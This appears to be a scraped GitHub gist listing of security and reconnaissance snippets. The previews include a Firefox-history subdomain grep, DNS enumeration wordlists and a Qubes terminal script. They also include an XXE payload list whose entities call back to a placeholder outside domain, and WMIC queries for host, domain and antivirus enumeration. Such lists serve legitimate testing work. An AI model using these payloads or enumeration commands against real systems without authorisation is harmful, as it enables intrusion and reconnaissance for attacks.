Skip to content

Instantly share code, notes, and snippets.

View nil0x42's full-sized avatar
:octocat:
Writing GHRecon..soon to be published!

nil0x42

:octocat:
Writing GHRecon..soon to be published!
482 followers · 69 following
View GitHub Profile
@nil0x42
nil0x42 / get-firefox-history-top-subdomains.sh
Created October 21, 2020 15:57
# extract top subdomains from your firefox history
# by @nil0x42
grep -Pao "https://[a-zA-Z0-9.-]+" ~/.mozilla/firefox/*/places.sqlite \
| sort -u | sed 's#.*://\([a-zA-Z0-9-]*\)\..*#\1#' | uniq -c | sort -rn
@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@nil0x42
nil0x42 / github_badge_makers.md
Last active October 25, 2020 16:35
Awesome Project Badge Generators
@nil0x42
nil0x42 / Awesome_GitHub_OSINT.md
Last active February 17, 2024 16:49
Awesome GitHub OSINT
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@jhaddix
jhaddix / all.txt
Created January 19, 2019 04:35 — forked from orangetw/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@jhaddix
jhaddix / all.txt
Last active July 15, 2024 23:21
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@richdougherty
richdougherty / Proxy headers.md
Last active March 10, 2021 09:29
@xorrior
xorrior / wmic_cmds.txt
Last active July 21, 2024 10:05
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@SietsevanderMolen
SietsevanderMolen / qubes_domain_terminal.sh
Last active May 8, 2024 12:43
Opens a terminal in the domain belonging to the current active winow
#!/bin/bash
run_terminal='
for t in $TERMINAL urxvt rxvt terminator Eterm aterm xterm gnome-terminal roxterm xfce4-terminal; do
which $t > /dev/null 2>&1 && exec $t;
done
'
get_id() {
local id=$(xprop -root _NET_ACTIVE_WINDOW)